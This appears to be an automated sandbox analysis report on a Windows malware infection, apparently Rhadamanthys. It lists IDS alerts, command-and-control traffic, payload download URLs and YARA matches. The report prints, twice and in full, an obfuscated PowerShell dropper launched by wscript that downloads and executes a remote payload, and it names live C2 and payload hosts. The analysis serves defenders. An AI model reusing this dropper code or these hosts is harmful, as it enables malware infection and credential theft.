$Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlR DePerJuNPoeCaSB,=El( ut aE RsKuTSo-PrPA AF,t oHen No$SnHStj leK rHinTee jR
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1180, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T10:39:46.626899+010028548242Potentially Bad Traffic45.149.241.1412023192.168.2.749921TCP
                        2024-12-05T10:39:58.412073+010028548242Potentially Bad Traffic45.149.241.1412023192.168.2.749952TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T10:39:15.799172+010028032702Potentially Bad Traffic192.168.2.749831202.71.109.228443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T10:38:11.816369+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.750002TCP
                        2024-12-05T10:39:23.551192+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.749852TCP
                        2024-12-05T10:39:46.626899+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.749921TCP
                        2024-12-05T10:39:58.412073+010028548021Domain Observed Used for C2 Detected45.149.241.1412023192.168.2.749952TCP
                        2024-12-05T10:40:07.840436+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.749973TCP
                        2024-12-05T10:40:15.007376+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.749994TCP
                        2024-12-05T10:40:22.187139+010028548021Domain Observed Used for C2 Detected45.149.241.141443192.168.2.750001TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526260F0 CryptUnprotectData,14_3_00007DF4526260F0
                        Source: unknownHTTPS traffic detected: 68.66.226.116:443 -> 192.168.2.7:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.7:49831 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.7:49973 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.7:49994 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.7:50001 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.7:50002 version: TLS 1.2
                        Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.1781112542.00000000079AC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb9 source: powershell.exe, 00000007.00000002.1781112542.000000000792A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 00000009.00000003.1942259235.00000000238F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1781112542.000000000792A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: svchost.exe, 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: msiexec.exe, 00000009.00000003.1941650537.0000000023AE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000009.00000003.1941909081.00000000238F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: msiexec.exe, 00000009.00000003.1941650537.0000000023AE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 00000009.00000003.1941909081.00000000238F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: win32u.pdb source: wmplayer.exe
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 00000009.00000003.1942259235.00000000238F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmp
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF452620B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,14_3_00007DF452620B80
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp14_3_00007DF452631741
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp14_2_0000024F6A2A0511
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 4x nop then dec esp21_2_0000020758795681
                        Source: chrome.exeMemory has grown: Private usage: 1MB later: 17MB

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.7:49852
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.7:49921
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:2023 -> 192.168.2.7:49952
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.7:49973
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.7:49994
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.7:50001
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 45.149.241.141:443 -> 192.168.2.7:50002
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023Jump to behavior
                        Source: global trafficTCP traffic: 192.168.2.7:49852 -> 45.149.241.141:2023
                        Source: Joe Sandbox ViewIP Address: 162.159.200.1 162.159.200.1
                        Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Joe Sandbox ViewJA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.149.241.141:2023 -> 192.168.2.7:49921
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 45.149.241.141:2023 -> 192.168.2.7:49952
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49831 -> 202.71.109.228:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.149.241.141
                        Source: global trafficHTTP traffic detected: GET /ab/Laney.dsp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: pts.groupConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ab/ab.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: pts.group
                        Source: global trafficDNS traffic detected: DNS query: www.tdejb.com
                        Source: global trafficDNS traffic detected: DNS query: ts1.aco.net
                        Source: global trafficDNS traffic detected: DNS query: gbg1.ntp.se
                        Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
                        Source: global trafficDNS traffic detected: DNS query: time.facebook.com
                        Source: global trafficDNS traffic detected: DNS query: time.cloudflare.com
                        Source: global trafficDNS traffic detected: DNS query: ntp.time.in.ua
                        Source: global trafficDNS traffic detected: DNS query: ntp.nict.jp
                        Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                        Source: powershell.exe, 00000004.00000002.1555228381.0000021D90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000007.00000002.1749523122.0000000005025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000004.00000002.1532725380.0000021D81C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pts.group
                        Source: powershell.exe, 00000004.00000002.1532725380.0000021D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1749523122.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000007.00000002.1749523122.0000000005025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000007.00000002.1781112542.0000000007998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: svchost.exeString found in binary or memory: https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22gl
                        Source: powershell.exe, 00000004.00000002.1532725380.0000021D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000007.00000002.1749523122.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000007.00000002.1749523122.0000000005025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000004.00000002.1532725380.0000021D81333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000004.00000002.1555228381.0000021D90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1773360781.0000000005F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000004.00000002.1532725380.0000021D80225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1532725380.0000021D81333000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pts.group
                        Source: powershell.exe, 00000004.00000002.1532725380.0000021D80225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1532725380.0000021D81333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1749523122.0000000005025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pts.group/ab/Laney.dsp
                        Source: powershell.exe, 00000004.00000002.1532725380.0000021D80225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1532725380.0000021D81333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1749523122.0000000005025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.puneet.ae/ab/Laney.dsp
                        Source: msiexec.exe, 00000009.00000002.1959171271.0000000000642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                        Source: unknownHTTPS traffic detected: 68.66.226.116:443 -> 192.168.2.7:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.7:49831 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.7:49973 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.7:49994 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.7:50001 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.149.241.141:443 -> 192.168.2.7:50002 version: TLS 1.2
                        Source: svchost.exe, 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_d3d8a722-9
                        Source: svchost.exe, 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_8508c526-7
                        Source: Yara matchFile source: 13.3.svchost.exe.54a0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.msiexec.exe.23b10000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.3.svchost.exe.56c0000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.3.svchost.exe.56c0000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.msiexec.exe.238f0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.1946474653.00000000054A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1942766561.0000000023B10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1942589272.00000000238F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1448, type: MEMORYSTR
                        Source: C:\Windows\System32\svchost.exeCode function: 14_3_00007DF4526208CC CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess,14_3_00007DF4526208CC

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: amsi32_8060.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 8060, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh 